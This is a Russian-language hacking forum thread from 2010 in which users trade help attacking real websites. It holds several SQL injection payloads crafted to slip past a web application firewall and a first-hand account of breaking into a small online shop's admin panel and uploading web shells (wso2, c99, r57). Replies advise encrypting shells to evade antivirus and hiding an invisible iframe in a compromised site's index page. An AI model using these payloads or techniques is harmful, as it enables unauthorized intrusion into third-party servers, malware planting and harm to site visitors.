08.08.2010, 17:55
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от SEWERN
нашел скул на одном сайте , раскрутил все норм. потом узнал что есть тот же домен на других зонах .ca u .com , на них стоит тот же двиг но при попытке заюзать скул (+union+select и тд) выдает
"Forbidden
You don't have permission to access /index.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request." и так везде ((
можно както обойти фильтр ?
WAF, судя по всему.
Некоторые варианты из многих возможных:
Код HTML:
-9999+/*!12345union*/+/*!12345select*/+1,2,table_name,4,5+/*!12345from*/+information_schema.tables
Код HTML:
-9999+/*!union+select+1,2,table_name,4,5+from+information_schema.tables*/
Код HTML:
-9999+/*%00*/union/*%00*/+/*%00*/select/*%00*/+1,2,table_name,4,5+/*%00*/from/*%00*/+information_schema.tables
Код HTML:
-9999+/*!union*/+/*!select*/+1,2,table_name,4,5+/*!from*/+information_schema.tables
Код HTML:
-9999/*!union+select+1,2,table_name,4,5+'aaa'from+information_schema.tables*/
Либо если есть возможность, то отправлять POST' ом, либо подзапросы.
|
|
|
08.08.2010, 18:01
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от legaljo
Продолжать крутить скули если появляется страница с надписью "hacking attempt"?
продолжай...
|
|
|
|
08.08.2010, 20:22
|
|
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
С нами:
9123693
Репутация:
94
|
|
да , сайты на других серверах.
Всем спасибо , попробую urlencode и варианты от Redwood.
|
|
|
|
08.08.2010, 22:21
|
|
Познающий
Регистрация: 02.08.2010
Сообщений: 45
С нами:
8304086
Репутация:
0
|
|
Как вставить ifraim в тело index.php чтобы главная страница не умерла???
|
|
|
|
08.08.2010, 22:31
|
|
Новичок
Регистрация: 31.07.2010
Сообщений: 8
С нами:
8306966
Репутация:
0
|
|
Всем привет! Я недавно начал изучать эту тему, поэтому прошу строго не ругать, если допущу какие-либо неточности в терминологии.
Вобщем такой вопрос:
Добыл доступ к админки одного маленького буржуйского шопа, нашел способ залить через нее веб шелл. Залил последнюю версию wso 2, захожу на шелл, а у меня там ограничено все, что только можно:
Safe-mode: ON
open_basedir, где прописан только адрес папки в которой лежит шелл + папки /tmp
Chmod: ---------, т.е. походу вообще ничего нельзя делать
Залил другой шелл: c99 от madnet - тоже самое.
Залил шелл r57 от wolfa - все стало гораздо лучше:
Safe-mode: OFF
open_basedir - нет ограничений
Chmod:drwxrwxrwx
Что не так с двумя первыми шеллами? Просто имхо r57 самый неюзабельный.
P.S. Chmod я указывал тот, что стоит рядом с адресом директории, в которую залит шелл.
|
|
|
|
08.08.2010, 22:44
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от manmerritt0
Всем привет! Я недавно начал изучать эту тему, поэтому прошу строго не ругать, если допущу какие-либо неточности в терминологии.
Вобщем такой вопрос:
Добыл доступ к админки одного маленького буржуйского шопа, нашел способ залить через нее веб шелл. Залил последнюю версию wso 2, захожу на шелл, а у меня там ограничено все, что только можно:
Safe-mode: ON
open_basedir, где прописан только адрес папки в которой лежит шелл + папки /tmp
Chmod: ---------, т.е. походу вообще ничего нельзя делать
Залил другой шелл: c99 от madnet - тоже самое.
Залил шелл r57 от wolfa - все стало гораздо лучше:
Safe-mode: OFF
open_basedir - нет ограничений
Chmod:drwxrwxrwx
Что не так с двумя первыми шеллами? Просто имхо r57 самый неюзабельный.
P.S. Chmod я указывал тот, что стоит рядом с адресом директории, в которую залит шелл.
да н еможет быть такого что при первых двух сейф мод он а на р57 офф, это настройки сервера и накак не шелла..что то нереальное говоришь...и еще чем это неюзабельный р57? вообще самый юзабельный шелл
|
|
|
|
08.08.2010, 22:55
|
|
Новичок
Регистрация: 31.07.2010
Сообщений: 8
С нами:
8306966
Репутация:
0
|
|
Сообщение от Gorev
да н еможет быть такого что при первых двух сейф мод он а на р57 офф, это настройки сервера и накак не шелла..что то нереальное говоришь...и еще чем это неюзабельный р57? вообще самый юзабельный шелл
Ладно, отбросим вопрос о юзабельности того или иного шелла. Это дело вкуса и опыта.
Меня больше интересует, почему ограничения при разных залитых шеллах разные. Ты говоришь, что этого не может быть, но тем не мене так есть. Меня это тоже очень сильно удивило.
А, вот еще чем мне не нравится r57: он дико палится антивирусами, а тот же wso2 мой касперский пока не замечает.
|
|
|
|
08.08.2010, 23:12
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от manmerritt0
Ладно, отбросим вопрос о юзабельности того или иного шелла. Это дело вкуса и опыта.
Меня больше интересует, почему ограничения при разных залитых шеллах разные. Ты говоришь, что этого не может быть, но тем не мене так есть. Меня это тоже очень сильно удивило.
А, вот еще чем мне не нравится r57: он дико палится антивирусами, а тот же wso2 мой касперский пока не замечает.
а ты его криптовать пробовал? если нет,то это и не удивительно что он у тебя палится...
|
|
|
|
08.08.2010, 23:41
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами:
9610572
Репутация:
32
|
|
Сообщение от M.MIB
Как вставить ifraim в тело index.php чтобы главная страница не умерла???
А почему она должна умереть?))
Находи тот участок кода, который выводит текст на страницу. Например контакты организации. И в конце строки вставляй свой iframe, только не забудь поставить width и height в ноль и visible:no.
|
|
|
|
09.08.2010, 00:01
|
|
Новичок
Регистрация: 31.07.2010
Сообщений: 8
С нами:
8306966
Репутация:
0
|
|
Сообщение от 547
а ты его криптовать пробовал? если нет,то это и не удивительно что он у тебя палится...
Нет не пробовал. Я собственно начал учится этой теме только неделю назад. Читал много статей на тематических форумах и ни в одной из них не поднимался вопрос криптовки веб шеллов.
Так что спасибо, буду разбираться и с этим вопросом.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
